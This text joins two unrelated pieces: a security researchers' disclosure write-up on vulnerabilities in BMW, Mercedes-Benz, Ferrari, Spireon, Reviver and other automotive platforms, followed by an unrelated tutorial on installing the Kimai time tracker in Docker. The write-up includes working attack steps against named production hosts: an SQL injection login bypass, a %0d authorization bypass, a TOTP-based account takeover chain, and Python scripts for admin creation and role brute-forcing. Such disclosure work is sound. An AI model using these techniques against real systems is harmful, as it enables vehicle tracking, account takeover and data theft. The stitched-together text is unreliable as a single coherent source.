    • Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the VIN number
    • Fully remote account takeover and PII disclosure via VIN number (name, phone number, email address, physical address)
    • Ability to lock users out of remotely managing their vehicle, change ownership
      • For Kias specifically, we could remotely access the 360-view camera and view live images from the car
  • Mercedes-Benz
    • Access to hundreds of mission-critical internal applications via improperly configured SSO, including…
      • Multiple Github instances behind SSO
      • Company-wide internal chat tool, ability to join nearly any channel
      • SonarQube, Jenkins, misc. build servers
      • Internal cloud deployment services for managing AWS instances
      • Internal Vehicle related APIs
    • Remote Code Execution on multiple systems
    • Memory leaks leading to employee/customer PII disclosure, account access
  • Hyundai, Genesis
    • Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the victim email address
    • Fully remote account takeover and PII disclosure via victim email address (name, phone number, email address, physical address)
    • Ability to lock users out of remotely managing their vehicle, change ownership
  • BMW, Rolls Royce
    • Company-wide core SSO vulnerabilities which let us access any employee application as any employee, allowing us to…
      • Access to internal dealer portals where you can query any VIN number to retrieve sales documents for BMW
      • Access any application locked behind SSO on behalf of any employee, including applications used by remote workers and dealerships
  • Ferrari
    • Full zero-interaction account takeover for any Ferrari customer account
    • IDOR to access all Ferrari customer records
    • Lack of access control allowing an attacker to create, modify, delete employee “back office” administrator user accounts and all user accounts with capabilities to modify Ferrari owned web pages through the CMS system
    • Ability to add HTTP routes on api.ferrari.com (rest-connectors) and view all existing rest-connectors and secrets associated with them (authorization headers)
  • Spireon
    • SQL injection and regex authorization bypass giving full administrative access to Spireon’s telematics platform
    • Ability to track and send arbitrary commands to roughly 15 million connected vehicles, and to take over fleet management systems for police departments, ambulance services, and truckers (see writeup 4 below)
  • Ford
    • Full memory disclosure on the production vehicle Telematics API:
      • Discloses customer PII and access tokens for tracking and executing commands on vehicles
      • Discloses configuration credentials used for internal services related to Telematics
      • Ability to authenticate into customer account and access all PII and perform actions against vehicles
    • Customer account takeover via improper URL parsing, allows an attacker to completely access victim account including vehicle portal
  • Reviver
    • Full super administrative access to manage all user accounts and vehicles for all Reviver connected vehicles. An attacker could perform the following:
      • Track the physical GPS location and manage the license plate for all Reviver customers (e.g. changing the slogan at the bottom of the license plate to arbitrary text)
      • Update any vehicle status to “STOLEN” which updates the license plate and informs authorities
      • Access all user records, including what vehicles people owned, their physical address, phone number, and email address
      • Access the fleet management functionality for any company, locate and manage all vehicles in a fleet
  • Porsche
    • Ability to retrieve vehicle location, send vehicle commands, and retrieve customer information via vulnerabilities affecting the vehicle Telematics service
  • Toyota
    • IDOR on Toyota Financial that discloses the name, phone number, email address, and loan status of any Toyota financial customers
  • Jaguar, Land Rover
    • User account IDOR disclosing password hash, name, phone number, physical address, and vehicle information
  • SiriusXM
    • Leaked AWS keys with full organizational read/write S3 access, ability to retrieve all files including (what appeared to be) user databases, source code, and config files for Sirius

Vulnerability Writeups

(1) Full Account Takeover on BMW and Rolls Royce via Misconfigured SSO

While testing BMW assets, we identified a custom SSO portal for employees and contractors of BMW. This was super interesting to us, as any vulnerabilities identified here could potentially allow an attacker to compromise any account connected to all of BMWs assets.

For instance, if a dealer wanted to access the dealer portal at a physical BMW dealership, they would have to authenticate through this portal. Additionally, this SSO portal was used to access internal tools and related devops infrastructure.

The first thing we did was fingerprint the host using recon tools like gau and ffuf. After a few hours of fuzzing, we identified a WADL file which exposed the API endpoints on the host when we sent the following HTTP request:

GET /rest/api/application.wadl HTTP/1.1
Host: xpita.bmwgroup.com

The HTTP response contained all available REST endpoints on the xpita host. We began enumerating the endpoints and sending mock HTTP requests to see what functionality was available.
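Since WADL is plain XML, pulling the advertised resource paths out of it is easy to script. A rough sketch using Python’s requests and the standard library, pointed at the same host and path as above:

# Rough sketch: fetch a WADL file and list the REST resource paths it
# advertises. Paths live on <resource path="..."> elements.
import requests
import xml.etree.ElementTree as ET

url = "https://xpita.bmwgroup.com/rest/api/application.wadl"
root = ET.fromstring(requests.get(url, timeout=10).text)

# WADL elements are namespaced, so match on the local tag name instead.
for elem in root.iter():
    if elem.tag.endswith("resource") and "path" in elem.attrib:
        print(elem.attrib["path"])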

One immediate finding was that we were able to query all BMW user accounts via sending asterisk queries in the user field API endpoint. This allowed us to enter something like “sam*” and retrieve the user information for a user named “sam.curry” without having to guess the actual username.

HTTP Request

GET /rest/api/users/example* HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response

HTTP/1.1 200 OK
Content-type: application/json

{"id":"redacted","firstName":"Example","lastName":"User","userName":"example.user"}

Once we found this vulnerability, we continued testing the other accessible API endpoints. One particularly interesting endpoint that stood out immediately was “/rest/api/chains/accounts/:user_id/totp”. We noticed the word “totp”, which usually stands for time-based one-time password generation.

When we sent an HTTP request to this endpoint using the SSO user ID gained from the wildcard query paired with the TOTP endpoint, it returned a random 7-digit number. The following HTTP request and response demonstrate this behavior:

HTTP Request

GET /rest/api/chains/accounts/unique_account_id/totp HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response

HTTP/1.1 200 OK
Content-type: text/plain

9373958

For whatever reason, it appeared that this HTTP request would generate a TOTP for the user’s account. We guessed that this interaction worked with the “forgot password” functionality, so we found an example user account by querying “example*” using our original wildcard finding and retrieving the victim user ID. After retrieving this ID, we initiated a reset password attempt for the user account until we got to the point where the system requested a TOTP code from the user’s 2FA device (e.g. email or phone).

At this point, we retrieved the TOTP code generated from the API endpoint and entered it into the reset password confirmation field.

It worked! We had reset a user account, gaining full account takeover on any BMW employee and contractor user.
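Condensed into code, the chain was just two unauthenticated GET requests plus the normal reset form. Here is a rough Python sketch of it as described above; the final reset-form submission is elided because its exact parameters aren’t shown here:

# Sketch of the BMW SSO takeover chain: resolve a victim's account via the
# wildcard user search, then ask the TOTP endpoint for a reset code.
import requests

BASE = "https://xpita.bmwgroup.com"

# Step 1: the wildcard search leaks the victim's user record without
# knowing the exact username.
user = requests.get(f"{BASE}/rest/api/users/example*", timeout=10).json()

# Step 2: the TOTP endpoint hands out the victim's reset code directly.
totp = requests.get(
    f"{BASE}/rest/api/chains/accounts/{user['id']}/totp", timeout=10
).text
print(f"reset code for {user['userName']}: {totp}")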

At this point, it was possible to completely take over any BMW or Rolls Royce employee account and access tools used by those employees.

To demonstrate the impact of the vulnerability, we simply Googled “BMW dealer portal” and used our account to access the dealer portal used by sales associates working at physical BMW and Rolls Royce dealerships.

After logging in, we observed that the demo account we took over was tied to an actual dealership, and we could access all of the functionality that the dealers themselves had access to. This included the ability to query a specific VIN number and retrieve sales documents for the vehicle.

With our level of access, there was a huge amount of functionality we could’ve performed against BMW and Rolls Royce customer accounts and customer vehicles. We stopped testing at this point and reported the vulnerability.

The vulnerabilities reported to BMW and Rolls Royce have since been fixed.

(2) Remote Code Execution and Access to Hundreds of Internal Tools on Mercedes-Benz via Misconfigured SSO

Early in our testing, someone in our group had purchased a Mercedes-Benz vehicle and so we began auditing the Mercedes-Benz infrastructure. We took the same approach as BMW and began testing the Mercedes-Benz employee SSO.

We weren’t able to find any vulnerabilities affecting the SSO portal itself, but by exploring the SSO website we observed that they were running some form of LDAP for the employee accounts. Based on our high level understanding of their infrastructure, we guessed that the individual employee applications used a centralized LDAP system to authenticate users. We began exploring each of these websites in an attempt to find a public registration so we could gain SSO credentials to access, even at a limited level, the employee applications.

After fuzzing random sites for a while, we eventually found the “umas.mercedes-benz.com” website, which was built for vehicle repair shops to request access to specific Mercedes-Benz tools. The website had public registration enabled, as it was built for repair shops, and appeared to write to the same database as the core employee LDAP system.

We filled out all the required fields for registration, created a user account, then used our recon data to identify sites which redirected to the Mercedes-Benz SSO. The first one we attempted was a pretty obvious employee tool: “git.mercedes-benz.com”, the company’s internal GitHub. We attempted to use our credentials to sign in to the Mercedes-Benz GitHub and saw that we were able to log in. Success!

The Mercedes-Benz Github, after authenticating, asked us to set up 2FA on our account so we could access the app. We installed the 2FA app and added it to our account, entered our code, then saw that we were in. We had access to “git.mercedes-benz.com” and began looking around.

After a few minutes, we saw that the Github instance had internal documentation and source code for various Mercedes-Benz projects including the Mercedes Me Connect app which was used by customers to remotely connect to their vehicles. The internal documentation gave detailed instructions for employees to follow if they wanted to build an application for Mercedes-Benz themselves to talk to customer vehicles and the specific steps one would have to take to talk to customer vehicles.

At this point, we reported the vulnerability, but got some pushback after a few days of waiting on an email response. The team seemed to misunderstand the severity, so they asked us to demonstrate further impact.

We used our employee account to log in to numerous applications containing sensitive information and achieved remote code execution via exposed actuators and Spring Boot consoles across dozens of internal applications used by Mercedes-Benz employees. One of these applications was the Mercedes-Benz Mattermost (basically Slack). We had permission to join any channel, including security channels, and could pose as a Mercedes-Benz employee who could ask whatever questions necessary for an actual attacker to elevate their privileges across the Benz infrastructure.

To give an overview, we could access the following services:

  • Multiple employee-only Githubs with sensitive information containing documentation and configuration files for multiple applications across the Mercedes-Benz infrastructure
  • Spring Boot actuators which led to remote code execution and information disclosure on sensitive employee- and customer-facing applications
  • Jenkins instances
  • AWS and cloud-computing control panels where we could request, manage, and access various internal systems
  • XENTRY systems used to communicate with customer vehicles
  • Internal OAuth and application-management related functionality for configuring and managing internal apps
  • Hundreds of miscellaneous internal services

(3) Full Account Takeover on Ferrari and Arbitrary Account Creation allows Attacker to Access, Modify, and Delete All Customer Information and Access Administrative CMS Functionality to Manage Ferrari Websites

When we began targeting Ferrari, we mapped out all domains under the publicly available domains like “ferrari.com” and browsed around to see what was accessible. One target we found was “api.ferrari.com”, a domain which offered both customer facing and internal APIs for Ferrari systems. Our goal was to get the highest level of access possible for this API.

We analyzed the JavaScript present on several Ferrari subdomains that looked like they were for use by Ferrari dealers. These subdomains included `cms-dealer.ferrari.com`, `cms-new.ferrari.com` and `cms-dealer.test.ferrari.com`.

One of the patterns we notice when testing web applications is poorly implemented single sign-on functionality which does not restrict access to the underlying application. This was the case for the above subdomains: it was possible to extract the JavaScript for these applications, allowing us to understand the backend API routes in use.

When reverse engineering JavaScript bundles, it is important to check what constants have been defined for the application. Often these constants contain sensitive credentials, or at the very least tell you where the backend API that the application talks to is hosted.

For this application, we noticed the following constants were set:

const i = {
                        production: !0,
                        envName: "production",
                        version: "0.0.0",
                        build: "20221223T162641363Z",
                        name: "ferrari.dws-preowned.backoffice",
                        formattedName: "CMS SPINDOX",
                        feBaseUrl: "https://{{domain}}.ferraridealers.com/",
                        fePreownedBaseUrl: "https://{{domain}}.ferrari.com/",
                        apiUrl: "https://api.ferrari.com/cms/dws/back-office/",
                        apiKey: "REDACTED",
                        s3Bucket: "ferrari-dws-preowned-pro",
                        cdnBaseUrl: "https://cdn.ferrari.com/cms/dws/media/",
                        thronAdvUrl: "https://ferrari-app-gestioneautousate.thron.com/?fromSAML#/ad/"
                    }

From the above constants we can understand that the base API URL is `https://api.ferrari.com/cms/dws/back-office/` and a potential API key for this API is `REDACTED`.

Digging further into the JavaScript we can look for references to `apiUrl` which will inform us as to how this API is called and how the API key is being used. For example, the following JavaScript sets certain headers if the API URL is being called:

})).url.startsWith(x.a.apiUrl) && !["/back-office/dealers", "/back-office/dealer-settings", "/back-office/locales", "/back-office/currencies", "/back-office/dealer-groups"].some(t => !!e.url.match(t)) && (e = (e = e.clone({
                                    headers: e.headers.set("Authorization", "" + (s || void 0))
                                })).clone({
                                    headers: e.headers.set("x-api-key", "" + a)
                                }));

All the elements needed for this discovery were conveniently tucked away in this JavaScript file. We knew what backend API to talk to and its routes, as well as the API key we needed to authenticate to the API.

Within the JavaScript, we noticed an API call to `/cms/dws/back-office/auth/bo-users`. When requesting this API through Burp Suite, it leaked all of the users registered for the Ferrari Dealers application. Furthermore, it was possible to send a POST request to this endpoint to add ourselves as a super admin user.
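A sketch of that enumeration and (hypothetical) self-registration in Python, reusing the apiUrl and x-api-key header pattern from the JavaScript above; the API key stays redacted and the POST body fields are illustrative, since the writeup doesn’t list them:

# Sketch of the back-office user enumeration and super-admin creation.
# The API key and the POST body fields are placeholders.
import requests

API = "https://api.ferrari.com/cms/dws/back-office"
HEADERS = {"x-api-key": "REDACTED", "Authorization": ""}

# Leak every registered back-office user.
users = requests.get(f"{API}/auth/bo-users", headers=HEADERS, timeout=10)
print(users.json())

# The same endpoint accepted a POST to create a new super-admin account
# (field names below are illustrative, not confirmed).
requests.post(
    f"{API}/auth/bo-users",
    headers=HEADERS,
    json={"userName": "attacker", "role": "SUPER_ADMIN"},
    timeout=10,
)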

While impactful, we were still looking for a vulnerability that affected the broader Ferrari ecosystem and every end user. Spending more time deconstructing the JavaScript, we found some API calls were being made to `rest-connectors`:

return t.prototype.getConnectors = function() {
    return this.httpClient.get("rest-connectors")
}, t.prototype.getConnectorById = function(t) {
    return this.httpClient.get("rest-connectors/" + t)
}, t.prototype.createConnector = function(t) {
    return this.httpClient.post("rest-connectors", t)
}, t.prototype.updateConnector = function(t, e) {
    return this.httpClient.put("rest-connectors/" + t, e)
}, t.prototype.deleteConnector = function(t) {
    return this.httpClient.delete("rest-connectors/" + t)
}, t.prototype.getItems = function() {
    return this.httpClient.get("rest-connector-models")
}, t.prototype.getItemById = function(t) {
    return this.httpClient.get("rest-connector-models/" + t)
}, t.prototype.createItem = function(t) {
    return this.httpClient.post("rest-connector-models", t)
}, t.prototype.updateItem = function(t, e) {
    return this.httpClient.put("rest-connector-models/" + t, e)
}, t.prototype.deleteItem = function(t) {
    return this.httpClient.delete("rest-connector-models/" + t)
}, t

The following request unlocked the final piece of the puzzle, revealing a treasure trove of API credentials for Ferrari:

GET /cms/dws/back-office/rest-connector-models HTTP/1.1

To explain this endpoint’s purpose: Ferrari had configured a number of backend APIs that could be communicated with by hitting specific paths. When hit, this API endpoint returned the list of those API endpoints, their hosts, and the authorization headers for them (in plain text).

This information disclosure allowed us to query Ferrari’s production API to access the personal information of any Ferrari customer. In addition to being able to view these API endpoints, we could also register new rest connectors or modify existing ones. 

HTTP Request

GET /core/api/v1/Users?email=ian@ian.sh HTTP/1.1
Host: fcd.services.ferrari.com

HTTP Response

HTTP/1.1 200 OK
Content-type: application/json

…"guid":"2d32922a-28c4-483e-8486-7c2222b7b59c","email":"ian@ian.sh","nickName":"ian@ian.sh","firstName":"Ian","lastName":"Carroll","birthdate":"1963-12-11T00:00:00"…

The API key and production endpoints that were disclosed using the previous staging API key allowed an attacker to access, create, modify, and delete any production user account. It additionally allowed an attacker to query users via email address or nickname.

Additionally, an attacker could POST to the “/core/api/v1/Users/:id/Roles” endpoint to edit their user roles, setting themselves to have super-user permissions or become a Ferrari owner.

This vulnerability would allow an attacker to access, modify, and delete any Ferrari customer account with access to manage their vehicle profile.

(4) SQL Injection and Regex Authorization Bypass on Spireon Systems allows Attacker to Access, Track, and Send Arbitrary Commands to 15 million Telematics systems and Additionally Fully Takeover Fleet Management Systems for Police Departments, Ambulance Services, Truckers, and Many Business Fleet Systems

When identifying car-related targets to hack on, we found the company Spireon. In the early 90s and 2000s, there were a few companies like OnStar, GoldStar, and FleetLocate which made standalone devices that were installed in vehicles to track and manage them. The devices can be tracked and can receive arbitrary commands, e.g. locking the starter so the vehicle cannot start.

Sometime in the past, Spireon had acquired many GPS Vehicle Tracking and Management Companies and put them under the Spireon parent company. 

We read through the Spireon marketing and saw that they claimed to have over 15 million connected vehicles. They offered services directly to customers and additionally many services through their subsidiary companies like OnStar.

We decided to research them because, if an attacker were able to compromise the administration functionality for these devices and fleets, they would be able to perform actions against over 15 million vehicles, with very interesting possibilities like sending a city’s police officers a dispatch location, disabling vehicle starters, and accessing financial loan information for dealers.

Our first target for this was very obvious: admin.spireon.com

The website appeared to be a very out of date global administration portal for Spireon employees to authenticate and perform some sort of action. We attempted to identify interesting endpoints which were accessible without authorization, but kept getting redirected back to the login.

Since the website was so old, we tried the trusted manual SQL injection payloads, but were kicked out by a WAF that was installed on the system.

We switched to a much simpler payload: sending an apostrophe, seeing if we got an error, then sending two apostrophes and seeing if we did not get an error. This worked! The system appeared to be reacting to sending an odd versus even number of apostrophes. This indicated that our input in both the username and password field was being passed to a system which could likely be vulnerable to some sort of SQL injection attack.
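The odd/even apostrophe probe is simple enough to automate. A sketch in Python, with the login path and form field names assumed:

# Sketch of the odd/even apostrophe test: one apostrophe should break the
# SQL query (error or different response), two should form a valid escaped
# string and behave normally. Form field names here are assumptions.
import requests

URL = "https://admin.spireon.com/login"

for probe in ("'", "''"):
    r = requests.post(
        URL,
        data={"username": f"test{probe}", "password": "test"},
        timeout=10,
    )
    print(f"payload {probe!r}: status={r.status_code} length={len(r.text)}")

# A differing status or length between the two probes hints that the input
# reaches an SQL query unsanitized.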

For the username field, we came up with a very simple payload:

victim' #

The above payload was designed to simply cut off the password check from the SQL query. We sent this HTTP request to Burp Suite’s Intruder with a common username list and observed various 301 redirects to “/dashboard” for the usernames “administrator” and “admin”.

After manually sending the HTTP request using the admin username, we observed that we were authenticated into the Spireon administrator portal as an administrator user. At this point, we browsed around the application and saw many interesting endpoints.

The functionality was designed to manage Spireon devices remotely. The administrator user had access to all Spireon devices, including those of OnStar, GoldStar, and FleetLocate. We could query these devices and retrieve the live location of whatever the devices were installed on, and additionally send arbitrary commands to these devices. There was additional functionality to overwrite the device configuration including what servers it reached out to download updated firmware.

Using this portal, an attacker could create a malicious Spireon package, update the vehicle configuration to call out to the modified package, then download and install the modified Spireon software.

At this point, an attacker could backdoor the Spireon device and run arbitrary commands against the device. 

Since these devices were very ubiquitous and were installed on things like tractors, golf carts, police cars, and ambulances, the impact of each device differed. For some, we could only access the live GPS location of the device, but for others we could disable the starter and send police and ambulance dispatch locations.

We reported the vulnerability immediately, but during testing, we observed an HTTP 500 error which disclosed the API URL of the backend API endpoint that the “admin.spireon.com” service reached out to. Initially, we dismissed this as we assumed it was internal, but after circling back we observed that we could hit the endpoint and it would trigger an HTTP 403 forbidden error.

Our goal now was to see if we could find some sort of authorization bypass on the host and figure out which endpoints were accessible. By bypassing the administrator UI, we could query vehicles and user accounts directly via the backend API calls.

We fuzzed the host and eventually observed some weird behavior:

By sending any string with “admin” or “dashboard”, the system would trigger an HTTP 403 forbidden response, but would return 404 if we didn’t include this string. As an example, if we attempted to load “/anything-admin-anything” we’d receive 403 forbidden, while if we attempted to load “/anything-anything” it would return a 404.

We took the blacklisted strings, put them in a list, then attempted to enumerate the specific endpoints with fuzzing characters (%00 to %FF) stuck behind the first and last characters.
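Scripting that enumeration looks roughly like the following; the backend API host is a placeholder, since it isn’t named here:

# Sketch of the prefix fuzzing: try every byte %00-%FF in front of the
# blocked strings and watch for a response other than 403/404.
import requests

BASE = "https://api.host.example"  # placeholder for the backend API host

for word in ("admin", "dashboard"):
    for byte in range(0x00, 0x100):
        path = f"/%{byte:02x}{word}"
        r = requests.get(BASE + path, timeout=10)
        if r.status_code not in (403, 404):
            print(f"{path} -> {r.status_code}")  # e.g. /%0dadmin -> 200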

During scanning, we saw that the following HTTP requests would return a 200 OK response:

GET /%0dadmin
GET /%0ddashboard

Through Burp Suite, we rendered the HTTP response in our browser and observed what came back: it was a full administrative portal for the core Spireon app. We quickly set up a match-and-replace rule to rewrite GET /admin and GET /dashboard to the endpoints with the %0d prefix.

After setting up this rule, we could browse to “/admin” or “/dashboard” and explore the website without having to perform any additional steps. We observed that there were dozens of endpoints which were used to query all connected vehicles, send arbitrary commands to connected vehicles, and view all customer tenant accounts, fleet accounts, and customer accounts. We had access to everything.

At this point, a malicious actor could backdoor the 15 million devices, query what ownership information was associated with a specific VIN, retrieve the full user information for all customer accounts, and invite themselves to manage any fleet which was connected to the app.

For our proof of concept, we invited ourselves to a random fleet account and saw that we received an invitation to administrate a US Police Department where we could track the entire police fleet.

(5) Mass Assignment on Reviver allows an Attacker to Remotely Track and Overwrite the Virtual License Plates for All Reviver Customers, Track and Administrate Reviver Fleets, and Access, Modify, and Delete All User Information

In October 2022, California announced that it had legalized digital license plates. We researched this for a while and found that most, if not all, of the digital license plates were issued through a company called Reviver.

If someone wanted a digital license plate, they’d buy the virtual Reviver license plate, which included a SIM card for remotely tracking and updating the plate. Customers who use Reviver could remotely update their license plate’s slogan and background, and additionally report the car as stolen by setting the plate tag to “STOLEN”.

Since the license plate could be used to track vehicles, we were super interested in Reviver and began auditing the mobile app. We proxied the HTTP traffic and saw that all API functionality was done on the “pr-api.rplate.com” website. After creating a user account, our user account was assigned to a unique “company” JSON object which allowed us to add other sub-users to our account.

The company JSON object was super interesting, as we could update many of the JSON fields within the object. One of these fields, called “type”, defaulted to “CONSUMER”. After noticing this, we dug through the app source code in hopes of finding another value to set it to, but were unsuccessful.

At this point, we took a step back and wondered if there was an actual website we could talk to versus proxying traffic through the mobile app. We looked online for a while before getting the idea to perform a password reset on our account, which gave us a URL to navigate to.

Once we opened the password reset URL, we observed that the website had tons of functionality including the ability to administer vehicles, fleets, and user accounts. This was super interesting as we now had a lot more API endpoints and functionality to access. Additionally, the JavaScript on the website appeared to have the names of the other roles that our user account could be (e.g. specialized names for user, moderator, admin, etc.)

We queried the “CONSUMER” string in the JavaScript and saw that other roles were defined there. After attempting to update our “role” parameter to the disclosed “CORPORATE” role, we refreshed our profile metadata and saw that it was successful! We were able to change our roles to ones other than the default user account, opening the door to potential privilege escalation vulnerabilities.

Even though we had updated our account to the “CORPORATE” role, we were still receiving authorization errors when logging into the website. We thought for a while until realizing that we could invite users to our modified account, which had the elevated role; the invited users might then be granted the required permissions, since they were added via an intended flow rather than by mass assignment.

After inviting a new account, accepting the invitation, and logging into the account, we observed that we no longer received authorization errors and could access fleet management functionality. This meant that we could likely (1) mass assign our account to an even higher elevated role (e.g. admin), then (2) invite a user to our account which would be assigned the appropriate permissions.

This perplexed us as there was likely some administration group which existed in the system but that we had not yet identified. We brute forced the “type” parameter using wordlists until we noticed that setting our group to the number “4” had updated our role to “REVIVER_ROLE”. It appeared that the roles were indexed to numbers, and we could simply run through the numbers 0-100 and find all the roles on the website.
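A sketch of that enumeration in Python; the endpoint path and auth header are assumptions, while the “type” field and role behavior come from the writeup above:

# Sketch of brute-forcing the indexed roles: mass-assign the company "type"
# field to each number 0-100 and read back which role it maps to.
# The endpoint path and auth header are assumptions, not confirmed.
import requests

API = "https://pr-api.rplate.com"  # API host seen in the mobile app traffic
HEADERS = {"Authorization": "Bearer <session token>"}  # placeholder

for idx in range(0, 101):
    requests.patch(f"{API}/company", headers=HEADERS,
                   json={"type": idx}, timeout=10)
    profile = requests.get(f"{API}/company", headers=HEADERS, timeout=10).json()
    print(idx, profile.get("role"))  # e.g. 0 -> "REVIVER", 4 -> "REVIVER_ROLE"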

The “0” role was the string “REVIVER”, and after setting this on our account and re-inviting a new user, we logged into the website normally and observed that the UI was completely broken and we couldn’t click any buttons. From what we could guess, we had the administrator role but were accessing the account using the customer facing frontend website and not the appropriate administrator frontend website. We would have to find the endpoints used by administrators ourselves.

Since our administrator account theoretically had elevated permissions, our first test was simply querying a user account and seeing if we could access someone else’s data: this worked!

We could take any of the normal API calls (viewing vehicle location, updating vehicle plates, adding new users to accounts) and perform the action using our super administrator account with full authorization.

At this point, we reported the vulnerability and observed that it was patched in under 24 hours. An actual attacker could remotely update, track, or delete anyone’s REVIVER plate. We could additionally access any dealer (e.g. Mercedes-Benz dealerships will often package REVIVER plates) and update the default image used by the dealer when the newly purchased vehicle still had DEALER tags.

The Reviver website also offered fleet management functionality which we had full access to.

(6) Full Remote Vehicle Access and Full Account Takeover affecting Hyundai and Genesis

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://twitter.com/i/web/status/1597695281881296897

(7) Full Remote Vehicle Access and Full Account Takeover affecting Honda, Nissan, Infiniti, Acura

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://twitter.com/i/web/status/1597792097175674880

(8) Full Vehicle Takeover on Nissan via Mass Assignment

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://twitter.com/i/web/status/1597984481511903234

Credits

Special thanks to the following people, who contributed to this project and helped create this blog post:

Source :
https://samcurry.net/web-hackers-vs-the-auto-industry/

How To Install Kimai Time Tracking App in Docker

In this guide, I’ll show you how to deploy the open source time tracking app Kimai in a Docker container. Kimai is free, browser-based (so it’ll work on mobile devices), and is extremely flexible for just about every use case.

It has a stopwatch feature where you can start/stop/pause a worklog timer. Then, it accumulates the total into daily, weekly, monthly or yearly reports, which can be exported or printed as invoices.

It supports single or multiple users, so you can even track time for your entire department. All statistics are visible on a beautiful dashboard, which makes historical time-tracking a breeze.


Why use Kimai Time Tracker?

For my scenario, I am salaried at work. However, since I’m an IT Manager, I often find myself working after hours or on weekends to patch servers, reboot systems, or perform system and infrastructure upgrades. Normally, I use a pen and paper or a notetaking app to track overtime, although this is pretty inefficient. Sometimes I forget when I started or stopped, or if I’ve written down the time on a notepad at home, I can’t view that time at work.

And when it comes to managing a team of others who also perform after hours maintenance, it becomes even harder to track their total overtime hours.

Over the past few weeks, I stumbled across Kimai and really love all the features, especially since I can spin it up with Docker or Docker Compose!

If you don’t have Docker installed, follow this guide: https://smarthomepursuits.com/how-to-install-docker-ubuntu/

If you don’t have Docker-Compose installed, follow this guide: https://smarthomepursuits.com/how-to-install-portainer-with-docker-in-ubuntu-20-04/

In this tutorial, we will be installing Kimai for a single user using standard Docker run commands. Other users can be added from the web UI after the initial setup.


Step 1: SSH into your Docker Host

Open PuTTY and SSH into your server that is running Docker and Docker Compose.
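If you’re not on Windows, a plain ssh session from any terminal works just as well (the username below is a placeholder; the IP is the example Docker host used throughout this guide):

ssh youruser@192.168.68.141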


Step 2: Create Kimai Database container

Enter the command below to create a new database container to use with Kimai. You can copy and paste into PuTTY by right-clicking after copying, or with CTRL+SHIFT+V in other SSH clients.

sudo docker run --rm --name kimai-mysql \
    -e MYSQL_DATABASE=kimai \
    -e MYSQL_USER=kimai \
    -e MYSQL_PASSWORD=kimai \
    -e MYSQL_ROOT_PASSWORD=kimai \
    -p 3399:3306 -d mysql
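One thing worth knowing: because of the --rm flag, this container (and its data) is removed as soon as it stops. If you want your time-tracking history to survive restarts, a minimal variant (my own sketch, not from the original guide; kimai-db is an arbitrary volume name) would be:

# Same database container, but persistent: no --rm, and a named volume
# mounted at MySQL's data directory.
sudo docker run --name kimai-mysql \
    -e MYSQL_DATABASE=kimai \
    -e MYSQL_USER=kimai \
    -e MYSQL_PASSWORD=kimai \
    -e MYSQL_ROOT_PASSWORD=kimai \
    -v kimai-db:/var/lib/mysql \
    -p 3399:3306 -d mysql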

Step 3: Start Kimai

Next, start the Kimai container using the database you just created. If you look at the Kimai GitHub page, you’ll notice that this isn’t the same command as the one shown there.

Here’s the original command (which I’m not using):

docker run --rm --name kimai-test -ti -p 8001:8001 -e DATABASE_URL=mysql://kimai:kimai@${HOSTNAME}:3399/kimai kimai/kimai2:apache

And here’s my command. I had to explicitly add TRUSTED_HOSTS, ADMINMAIL, and ADMINPASS, and change ${HOSTNAME} to the IP address of my Docker host. Otherwise, I wasn’t able to access Kimai from other computers on my local network.

  • Port (8001) = change the port if it is already in use
  • TRUSTED_HOSTS = add the IP address of your Docker host
  • ADMINMAIL / ADMINPASS = the admin email and password. This is what you’ll use to log in with.
  • DATABASE_URL = change the host portion to your Docker host’s IP address
sudo docker run --rm --name kimai -ti -p 8001:8001 \
    -e TRUSTED_HOSTS=192.168.68.141,localhost,127.0.0.1 \
    -e ADMINMAIL=example@gmail.com \
    -e ADMINPASS=8charpassword \
    -e DATABASE_URL=mysql://kimai:kimai@192.168.68.141:3399/kimai \
    kimai/kimai2:apache

Note that 8 characters is the minimum for the password.
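Since this guide assumes Docker Compose is installed, here is a rough equivalent of the two docker run commands as a compose file. This is my own sketch (not the official Kimai compose file), mirroring the values above and adding the kimai-db volume for persistence; adjust IPs, ports, and credentials to your environment:

# Write the compose file, then bring both containers up together.
cat > docker-compose.yml <<'EOF'
version: "3"
services:
  kimai-mysql:
    image: mysql
    environment:
      - MYSQL_DATABASE=kimai
      - MYSQL_USER=kimai
      - MYSQL_PASSWORD=kimai
      - MYSQL_ROOT_PASSWORD=kimai
    volumes:
      - kimai-db:/var/lib/mysql
    ports:
      - "3399:3306"
  kimai:
    image: kimai/kimai2:apache
    environment:
      - TRUSTED_HOSTS=192.168.68.141,localhost,127.0.0.1
      - ADMINMAIL=example@gmail.com
      - ADMINPASS=8charpassword
      - DATABASE_URL=mysql://kimai:kimai@192.168.68.141:3399/kimai
    ports:
      - "8001:8001"
    depends_on:
      - kimai-mysql
volumes:
  kimai-db:
EOF
sudo docker-compose up -d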


Step 4: Log In via Web Browser

Kimai should now be running!

To check, go to http://<dockerIP>:8001 in a web browser (in my case, http://192.168.68.141:8001).
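If you’d rather verify from the shell first, a quick request to the same address will do; any HTTP response at all means the container is listening:

curl -I http://192.168.68.141:8001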

Then simply log in with the credentials you created.


Step 5: Basic Setup

This app is extremely powerful and customizable, so I won’t be going over all the available options since everyone has different needs.

Like I mentioned earlier, I’m using Kimai for overtime tracking only, so the first step for me is to create a new “customer”.

Create a Customer

This is sort of unintuitive, but you need to create a customer before you can start tracking time to a project. I’m creating a generic “Employee” customer.

Click Customers on the left sidebar, then click the + button in the top right corner.

Create A Project

Click Projects on the left sidebar:

Then click the + button in the top right corner.

Add a name, choose the customer you just created, and then choose a date range.

Create An Activity

Click Activity on the left, then create an activity. I’m calling mine Overtime Worked and assigning it to the Project “Overtime 2021” I just created.


Step 6: Change “Timetracking Mode” to Time-clock

Click Settings. Under Timetracking mode, change it to Time-Clock. This will let you click the Play button to start and stop time worked instead of having to manually enter start and stop times.


Step 7: Start Tracking Time!

To start tracking time, simply click the timer widget in the top right corner.

A screen will pop up asking you what project and activity you want to apply the time to.

The self-hosted stopwatch will start tracking time right away. You can then view the timesheets for yourself under the My Times section, or for all users under the Timesheets or Reporting tabs.


Wrapping Up

Hopefully this guide helped you get Kimai installed and set up! If you have any questions, feel free to let me know in the comments below and I’ll do my best to help you out.


My Homelab Equipment

